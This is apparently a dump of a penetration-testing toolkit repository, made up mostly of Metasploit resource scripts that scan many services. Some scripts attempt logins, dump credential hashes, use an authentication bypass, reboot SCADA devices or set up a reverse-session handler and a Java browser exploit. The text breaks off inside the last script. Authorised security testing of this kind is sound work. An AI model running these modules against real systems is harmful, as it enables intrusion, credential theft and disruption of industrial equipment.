├── .gitignore ├── report ├── assets │ ├── images │ │ ├── logo.png │ │ ├── icons │ │ │ ├── fail.png │ │ │ ├── info.png │ │ │ ├── pass.png │ │ │ └── warn.png │ │ └── banner.svg │ └── fonts │ │ ├── FontAwesome.otf │ │ ├── ironvue-icons.eot │ │ ├── ironvue-icons.ttf │ │ ├── ironvue-icons.woff │ │ ├── ironvue-icons.woff2 │ │ ├── fontawesome-webfont.eot │ │ ├── fontawesome-webfont.ttf │ │ └── fontawesome-webfont.woff ├── tools │ ├── active │ │ └── .gitignore │ └── recon-ng │ │ └── .gitignore ├── data │ ├── hosts.htm │ ├── doc.htm │ ├── emails.htm │ ├── names.htm │ ├── pdf.htm │ ├── ppt.htm │ ├── txt.htm │ ├── waf.htm │ ├── xls.htm │ ├── records.htm │ ├── squatting.htm │ ├── subdomains.htm │ ├── traceroute.htm │ ├── whatweb.htm │ ├── whois-ip.htm │ ├── active-recon.htm │ ├── passive-recon.htm │ ├── whois-domain.htm │ ├── zonetransfer.htm │ ├── certificates.htm │ ├── registered-domains.htm │ └── summary.htm └── pages │ └── config.htm ├── notes ├── Python │ ├── discover │ │ ├── requirements.txt │ │ ├── recon │ │ │ ├── salesforce.py │ │ │ └── person.py │ │ └── web │ │ │ └── multitabs.py │ ├── ex1.py │ ├── test.py │ ├── fuzzer-pop3.py │ └── scrape.py ├── mobile.txt ├── ssl.txt ├── consulting.txt ├── snmp.txt ├── PowerShell │ ├── PS-Attack.txt │ └── basic.txt ├── exploits.txt ├── dns.txt ├── maltego.txt ├── insecure-protocols.txt ├── cidr.txt ├── osx.txt ├── egress.txt ├── git.txt ├── ssl-setup.txt ├── smtp.txt ├── nexpose.txt ├── terraform.txt ├── shodan.txt ├── nmap-fire.txt ├── kali.txt └── ldap-owa.txt ├── resource ├── 2049-nfs.rc ├── 523-udp-db2.rc ├── 110-pop3.rc ├── 137-udp-netbios.rc ├── 1414-ibm-mq.rc ├── 143-imap.rc ├── 1720-h323.rc ├── 28784-scada.rc ├── 514-rshell.rc ├── 548-afp.rc ├── 5920-cctv.rc ├── 6379-redis.rc ├── 79-finger.rc ├── 19-chargen.rc ├── 20256-unitronics.rc ├── 3000-emc.rc ├── 3310-clamav.rc ├── 443-vmware.rc ├── 4800-udp-moxa.rc ├── 5000-satel.rc ├── 512-rexec.rc ├── 513-rlogin.rc ├── 5984-couchdb.rc ├── 8400-adobe.rc ├── 902-vmware.rc ├── 
135-dcerpc.rc ├── 3050-borland.rc ├── 3500-emc.rc ├── 407-udp-motorola.rc ├── 5985-winrm.rc ├── 8834-nessus.rc ├── 9000-sharp.rc ├── 37777-dahua-dvr.rc ├── 46824-scada.rc ├── 5631-pcanywhere.rc ├── 5632-pcanywhere.rc ├── 7777-backdoor.rc ├── 8000-canon.rc ├── 8222-vmware.rc ├── 831-easycafe.rc ├── 998-zenworks.rc ├── 9999-telnet.rc ├── 13364-rosewill.rc ├── 30718-telnet.rc ├── 4786-cisco-smart-install.rc ├── 5040-dcerpc.rc ├── 9084-vmware.rc ├── recon-ng-import-ips.rc ├── recon-ng-import-emails.rc ├── 50000-db2.rc ├── 5060-udp-sip.rc ├── 111-rpc.rc ├── 1158-oracle.rc ├── 1900-udp-upnp.rc ├── 5060-sip.rc ├── 1099-rmi.rc ├── 8080-oracle.rc ├── 8080-tomcat.rc ├── 1604-udp-citrix.rc ├── 3306-mysql.rc ├── 5560-oracle.rc ├── 69-tftp.rc ├── 17185-udp-vxworks.rc ├── 2362-udp-scada.rc ├── 771-scada.rc ├── recon-ng.rc ├── 5900-vnc.rc ├── 465-smtp.rc ├── 3389-rdp.rc ├── 623-udp-ipmi.rc ├── 23-telnet.rc ├── recon-ng-import-names.rc ├── listener.rc ├── java.rc ├── 25-smtp.rc ├── 502-scada.rc ├── 1433-mssql.rc ├── http.rc ├── 5432-postgres.rc ├── 22-ssh.rc ├── 1521-oracle.rc ├── 6000-5-x11.rc ├── post-osx.rc ├── 123-udp-ntp.rc ├── 21-ftp.rc ├── 9100-printers.rc ├── recon-ng-active.rc ├── post-linux.rc ├── 445-smb.rc ├── 161-udp-snmp.rc └── post-windows.rc ├── config ├── install.sh ├── vimrc ├── zshrc └── tmux.conf ├── misc ├── deploy │ ├── outputs.tf │ ├── ansible │ │ └── redirector-c2.yml │ └── main.tf ├── prepmap.sh ├── netblocks.sh ├── rebrand.sh ├── dns-transfer.sh ├── ping-sweep.sh ├── dns-reverse.sh ├── subdomains-from-ssl.sh ├── dns-forward.sh ├── crawl.sh ├── compare-sites.sh └── netblocks.txt ├── directObjectRef.sh ├── person.sh ├── LICENSE ├── parsers ├── utfdictcsv.py ├── parse-burp.py ├── parse-nessus.py ├── parse-nmap.py ├── parse-nessus-feed.py └── parse-qualys.py ├── mods ├── virustotal_subdomain_enum.py ├── goofile.py ├── goog-mail.py └── crtsh_enum_psql.py ├── nikto.sh ├── listener.sh ├── generateTargets.sh ├── multiTabs.sh ├── domain.sh ├── ssl.sh └── 
newModules.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | __pycache__/ -------------------------------------------------------------------------------- /report/assets/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/logo.png -------------------------------------------------------------------------------- /notes/Python/discover/requirements.txt: -------------------------------------------------------------------------------- 1 | lxml>=4.2.5 2 | requests>=2.21.1 3 | requests-html>=0.10.0 4 | texttable>=1.5.0 -------------------------------------------------------------------------------- /report/tools/active/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /report/assets/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /report/assets/images/icons/fail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/fail.png -------------------------------------------------------------------------------- /report/assets/images/icons/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/info.png -------------------------------------------------------------------------------- /report/assets/images/icons/pass.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/pass.png -------------------------------------------------------------------------------- /report/assets/images/icons/warn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/warn.png -------------------------------------------------------------------------------- /report/tools/recon-ng/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.eot -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.ttf -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.woff -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.woff2 
-------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /resource/2049-nfs.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 2049 4 | 5 | use auxiliary/scanner/nfs/nfsmount 6 | run 7 | -------------------------------------------------------------------------------- /resource/523-udp-db2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 523 4 | 5 | use auxiliary/scanner/db2/discovery 6 | run 7 | -------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /resource/110-pop3.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 110 4 | 5 | use auxiliary/scanner/pop3/pop3_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/137-udp-netbios.rc: 
-------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 137 4 | 5 | use auxiliary/scanner/netbios/nbname 6 | run 7 | -------------------------------------------------------------------------------- /resource/1414-ibm-mq.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1414 4 | 5 | use auxiliary/scanner/misc/ibm_mq_enum 6 | run 7 | -------------------------------------------------------------------------------- /resource/143-imap.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 143 4 | 5 | use auxiliary/scanner/imap/imap_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/1720-h323.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1720 4 | 5 | use auxiliary/scanner/h323/h323_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/28784-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 28784 4 | 5 | use auxiliary/scanner/scada/koyo_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/514-rshell.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 514 4 | 5 | use auxiliary/scanner/rservices/rsh_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/548-afp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 548 4 | 5 
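use auxiliary/scanner/afp/afp_server_info
run
--------------------------------------------------------------------------------
/resource/5920-cctv.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5920

# cctv_dvr_login attempts logins rather than only fingerprinting; each attempt
# shows up as an authentication event on the target.
use auxiliary/scanner/misc/cctv_dvr_login
run
--------------------------------------------------------------------------------
/resource/6379-redis.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 6379

# "use" was missing on this line, so msfconsole rejected it as an unknown
# command and the following "run" executed with no module selected.
use auxiliary/scanner/redis/redis_server
run
--------------------------------------------------------------------------------
/resource/79-finger.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 79

use auxiliary/scanner/finger/finger_users
run
--------------------------------------------------------------------------------
/resource/19-chargen.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 19

use auxiliary/scanner/chargen/chargen_probe
run
--------------------------------------------------------------------------------
/resource/20256-unitronics.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 20256

use auxiliary/scanner/scada/pcomclient
run
--------------------------------------------------------------------------------
/resource/3000-emc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3000

# This is an admin/ module, not a scanner/ one: it sends commands to the
# service instead of only identifying it. Confirm it is within scope before
# running it from a discovery sweep.
use auxiliary/admin/emc/alphastor_devicemanager
run
--------------------------------------------------------------------------------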
-------------------------------------------------------------------------------- /resource/3310-clamav.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3310 4 | 5 | use auxiliary/scanner/misc/clamav_control 6 | run 7 | -------------------------------------------------------------------------------- /resource/443-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 443 4 | 5 | use auxiliary/scanner/vmware/esx_fingerprint 6 | run 7 | -------------------------------------------------------------------------------- /resource/4800-udp-moxa.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 4800 4 | 5 | use auxiliary/scanner/scada/moxa_discover 6 | run 7 | -------------------------------------------------------------------------------- /resource/5000-satel.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5000 4 | 5 | use auxiliary/scanner/telnet/satel_cmd_exec 6 | run 7 | -------------------------------------------------------------------------------- /resource/512-rexec.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 512 4 | 5 | use auxiliary/scanner/rservices/rexec_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/513-rlogin.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 513 4 | 5 | use auxiliary/scanner/rservices/rlogin_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/5984-couchdb.rc: 
-------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5984 4 | 5 | use auxiliary/scanner/couchdb/couchdb_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/8400-adobe.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8400 4 | 5 | use auxiliary/scanner/http/adobe_xml_inject 6 | run 7 | -------------------------------------------------------------------------------- /resource/902-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 902 4 | 5 | use auxiliary/scanner/vmware/vmauthd_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/135-dcerpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 135 4 | 5 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor 6 | run 7 | -------------------------------------------------------------------------------- /resource/3050-borland.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3050 4 | 5 | use auxiliary/scanner/misc/ib_service_mgr_info 6 | run 7 | -------------------------------------------------------------------------------- /resource/3500-emc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3500 4 | 5 | use auxiliary/admin/emc/alphastor_librarymanager 6 | run 7 | -------------------------------------------------------------------------------- /resource/407-udp-motorola.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS 
file: 2 | setg THREADS 255 3 | setg RPORT 407 4 | 5 | use auxiliary/scanner/motorola/timbuktu_udp 6 | run 7 | -------------------------------------------------------------------------------- /resource/5985-winrm.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5985 4 | 5 | use auxiliary/scanner/winrm/winrm_auth_methods 6 | run 7 | -------------------------------------------------------------------------------- /resource/8834-nessus.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8834 4 | 5 | use auxiliary/scanner/nessus/nessus_xmlrpc_ping 6 | run 7 | -------------------------------------------------------------------------------- /resource/9000-sharp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9000 4 | 5 | use auxiliary/scanner/misc/raysharp_dvr_passwords 6 | run 7 | -------------------------------------------------------------------------------- /resource/37777-dahua-dvr.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 37777 4 | 5 | use auxiliary/scanner/misc/dahua_dvr_auth_bypass 6 | run 7 | -------------------------------------------------------------------------------- /resource/46824-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 46824 4 | 5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /resource/5631-pcanywhere.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5631 4 | 5 | use 
auxiliary/scanner/pcanywhere/pcanywhere_tcp 6 | run 7 | -------------------------------------------------------------------------------- /resource/5632-pcanywhere.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5632 4 | 5 | use auxiliary/scanner/pcanywhere/pcanywhere_udp 6 | run 7 | -------------------------------------------------------------------------------- /resource/7777-backdoor.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 7777 4 | 5 | use auxiliary/scanner/backdoor/energizer_duo_detect 6 | run 7 | -------------------------------------------------------------------------------- /resource/8000-canon.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8000 4 | 5 | use auxiliary/scanner/printer/canon_iradv_pwd_extract 6 | run 7 | -------------------------------------------------------------------------------- /resource/8222-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8222 4 | 5 | use auxiliary/scanner/vmware/vmware_server_dir_trav 6 | run 7 | -------------------------------------------------------------------------------- /resource/831-easycafe.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 831 4 | 5 | use auxiliary/scanner/misc/easycafe_server_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /resource/998-zenworks.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 998 4 | 5 | use auxiliary/scanner/misc/zenworks_preboot_fileaccess 6 | run 7 
| -------------------------------------------------------------------------------- /resource/9999-telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9999 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/13364-rosewill.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 13364 4 | 5 | use auxiliary/scanner/misc/rosewill_rxs3211_passwords 6 | run 7 | -------------------------------------------------------------------------------- /resource/30718-telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 30718 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_password 6 | run 7 | -------------------------------------------------------------------------------- /resource/4786-cisco-smart-install.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 4786 4 | 5 | use auxiliary/scanner/misc/cisco_smart_install 6 | run 7 | -------------------------------------------------------------------------------- /resource/5040-dcerpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5040 4 | 5 | use auxiliary/scanner/dcerpc/windows_deployment_services 6 | run 7 | -------------------------------------------------------------------------------- /resource/9084-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9084 4 | 5 | use auxiliary/scanner/vmware/vmware_update_manager_traversal 6 | run 7 | 
-------------------------------------------------------------------------------- /resource/recon-ng-import-ips.rc: -------------------------------------------------------------------------------- 1 | modules load import/list 2 | options set FILENAME /tmp/tmp-ips 3 | options set TABLE hosts 4 | options set COLUMN ip_address 5 | run 6 | -------------------------------------------------------------------------------- /resource/recon-ng-import-emails.rc: -------------------------------------------------------------------------------- 1 | modules load import/list 2 | options set FILENAME /tmp/tmp-emails 3 | options set TABLE contacts 4 | options set COLUMN email 5 | run 6 | -------------------------------------------------------------------------------- /resource/50000-db2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 50000 4 | 5 | use auxiliary/scanner/db2/db2_version 6 | run 7 | 8 | use auxiliary/scanner/db2/db2_auth 9 | run 10 | -------------------------------------------------------------------------------- /resource/5060-udp-sip.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator 6 | run 7 | 8 | use auxiliary/scanner/sip/options 9 | run 10 | -------------------------------------------------------------------------------- /resource/111-rpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 111 4 | 5 | use auxiliary/scanner/misc/sunrpc_portmapper 6 | run 7 | 8 | use auxiliary/scanner/nfs/nfsmount 9 | run 10 | -------------------------------------------------------------------------------- /resource/1158-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | 
setg RPORT 1158 4 | 5 | use auxiliary/scanner/oracle/emc_sid 6 | run 7 | 8 | use auxiliary/scanner/oracle/spy_sid 9 | run 10 | -------------------------------------------------------------------------------- /resource/1900-udp-upnp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1900 4 | 5 | use auxiliary/scanner/upnp/ssdp_amp 6 | run 7 | 8 | use auxiliary/scanner/upnp/ssdp_msearch 9 | run 10 | -------------------------------------------------------------------------------- /resource/5060-sip.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator_tcp 6 | run 7 | 8 | use auxiliary/scanner/sip/options_tcp 9 | run 10 | -------------------------------------------------------------------------------- /resource/1099-rmi.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1099 4 | 5 | use auxiliary/scanner/misc/java_rmi_server 6 | run 7 | 8 | use auxiliary/scanner/misc/java_jmx_server 9 | run 10 | -------------------------------------------------------------------------------- /resource/8080-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8080 4 | 5 | use auxiliary/scanner/oracle/xdb_sid_brute 6 | run 7 | 8 | use auxiliary/scanner/oracle/xdb_sid 9 | run 10 | -------------------------------------------------------------------------------- /resource/8080-tomcat.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8080 4 | 5 | use auxiliary/scanner/http/tomcat_enum 6 | run 7 | 8 | use auxiliary/scanner/http/tomcat_mgr_login 9 | run 10 | 
-------------------------------------------------------------------------------- /resource/1604-udp-citrix.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1604 4 | 5 | use gather/citrix_published_applications 6 | run 7 | 8 | use gather/citrix_published_bruteforce 9 | run 10 | -------------------------------------------------------------------------------- /resource/3306-mysql.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3306 4 | 5 | use auxiliary/scanner/mysql/mysql_version 6 | run 7 | 8 | use scanner/mysql/mysql_authbypass_hashdump 9 | run 10 | -------------------------------------------------------------------------------- /resource/5560-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5560 4 | 5 | use auxiliary/scanner/oracle/isqlplus_login 6 | run 7 | 8 | use auxiliary/scanner/oracle/isqlplus_sidbrute 9 | run 10 | -------------------------------------------------------------------------------- /resource/69-tftp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 69 4 | 5 | use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp 6 | run 7 | 8 | use auxiliary/scanner/tftp/netdecision_tftp 9 | run 10 | -------------------------------------------------------------------------------- /resource/17185-udp-vxworks.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 17185 4 | 5 | use auxiliary/scanner/vxworks/wdbrpc_version 6 | run 7 | 8 | use auxiliary/scanner/vxworks/wdbrpc_bootline 9 | run 10 | -------------------------------------------------------------------------------- /resource/2362-udp-scada.rc: 
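--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 2362

# Identify the device first; the version probe is read-only.
use auxiliary/scanner/scada/digi_addp_version
run

# digi_addp_reboot is not a discovery check: as its name says, it issues a
# reboot request, and a device that accepts it restarts. On field equipment
# that can interrupt a live process, so run it only with explicit authorisation
# for that outcome. It was previously ordered before the version probe, which
# would have left the version scan talking to a rebooting device.
use auxiliary/scanner/scada/digi_addp_reboot
run
--------------------------------------------------------------------------------
/resource/771-scada.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 771

use auxiliary/scanner/scada/digi_realport_serialport_scan
run

use auxiliary/scanner/scada/digi_realport_version
run
--------------------------------------------------------------------------------
/resource/recon-ng.rc:
--------------------------------------------------------------------------------
modules load recon/companies-contacts/pen
run
modules load recon/domains-contacts/pen
run
modules load recon/domains-contacts/pgp_search
run
modules load recon/hosts-hosts/resolve
run
--------------------------------------------------------------------------------
/resource/5900-vnc.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 5900

use auxiliary/scanner/vnc/ard_root_pw
run

# vnc_login is a password-guessing module; every attempt is an authentication
# failure in the target's logs, so expect it to be noticed on monitored hosts.
use auxiliary/scanner/vnc/vnc_login
run

use auxiliary/scanner/vnc/vnc_none_auth
run
--------------------------------------------------------------------------------
/resource/465-smtp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 465

# Port 465 is normally implicit TLS (SMTPS). Nothing here enables SSL for the
# connection, so against a real SMTPS listener these modules presumably never
# complete the handshake; verify and consider `setg SSL true` if the results
# are empty.
use auxiliary/scanner/smtp/smtp_enum
run

use auxiliary/scanner/smtp/smtp_ntlm_domain
run

# smtp_relay tests relaying by submitting a message; the test traffic may be
# delivered to real mailboxes, so check its MAILFROM/MAILTO options first.
use auxiliary/scanner/smtp/smtp_relay
run
--------------------------------------------------------------------------------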
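/resource/3389-rdp.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 3389

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
run

use auxiliary/scanner/rdp/ms12_020_check
run

use auxiliary/scanner/rdp/rdp_scanner
run
--------------------------------------------------------------------------------
/resource/623-udp-ipmi.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 623

use auxiliary/scanner/ipmi/ipmi_cipher_zero
run

use auxiliary/scanner/ipmi/ipmi_version
run

# ipmi_dumphashes retrieves credential material (password hashes); treat the
# resulting loot and database entries as sensitive and clear them when the
# engagement ends.
use auxiliary/scanner/ipmi/ipmi_dumphashes
run
--------------------------------------------------------------------------------
/config/install.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Installs the bundled tmux, vim and zsh settings for the invoking user.
# tmux.conf and vimrc are copied over any existing file; zshrc is appended to
# the user's .zshrc, so running this twice appends the settings twice.

# The bundled files sit next to this script, so do not depend on the caller's cwd.
cd "$(dirname "$0")" || exit 1

# $HOME already holds the invoking user's home directory; the previous
# `eval echo ~$USER` form ran eval on an environment-controlled value for no gain.
if [[ $UID == 0 ]]; then
    home='/root/'
else
    home="$HOME/"
fi

cp tmux.conf "$home.tmux.conf"
cp vimrc "$home.vimrc"
cat zshrc >> "$home.zshrc"

# Sourcing here only affects this script's own shell; the caller has to open a
# new shell (or source ~/.zshrc itself) to pick the settings up.
source "$home.zshrc" 2>/dev/null
--------------------------------------------------------------------------------
/resource/23-telnet.rc:
--------------------------------------------------------------------------------
setg RHOSTS file:
setg THREADS 255
setg RPORT 23

use auxiliary/scanner/telnet/telnet_version
run

use auxiliary/scanner/telnet/telnet_encrypt_overflow
run

use auxiliary/scanner/telnet/telnet_ruggedcom
run
--------------------------------------------------------------------------------
/resource/recon-ng-import-names.rc:
--------------------------------------------------------------------------------
modules load import/csv_file
options set FILENAME /tmp/names.csv
options set TABLE contacts
options set 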
COLUMN_SEPARATOR # 5 | options set CSV_FIRST_NAME first_name 6 | options set CSV_LAST_NAME last_name 7 | options set CSV_TITLE title 8 | run 9 | -------------------------------------------------------------------------------- /resource/listener.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set PAYLOAD aaa 3 | set LHOST bbb 4 | set LPORT ccc 5 | set ExitOnSession false 6 | set AutoVerifySession false 7 | set AutoSystemInfo false 8 | set AutoLoadStdapi false 9 | set AutoRunScript post/windows/manage/migrate 10 | exploit -j 11 | -------------------------------------------------------------------------------- /misc/deploy/outputs.tf: -------------------------------------------------------------------------------- 1 | output "instance_id" { 2 | description = "ID of payload instance" 3 | value = aws_instance.redirector.id 4 | } 5 | 6 | output "instance_ip" { 7 | description = "Public IP of the payload instance" 8 | value = aws_instance.redirector.public_ip 9 | } 10 | -------------------------------------------------------------------------------- /misc/prepmap.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | # https://www.darrinward.com/lat-long/ 4 | 5 | cat /root/tmp | egrep -v '(\+|latitude|returned|Spooling|stop)' | sed 's/| //g' | sed 's/|//g' | sed 's/^[ \t]*//;s/[ \t]*$//' | sed 's/ /,/g' | sed 's/ /,/g' | sed '/^$/d' > /root/latlong.txt 6 | echo 7 | echo 8 | -------------------------------------------------------------------------------- /resource/java.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/browser/java_jre17_jmxbean 2 | set SRVPORT 443 3 | set 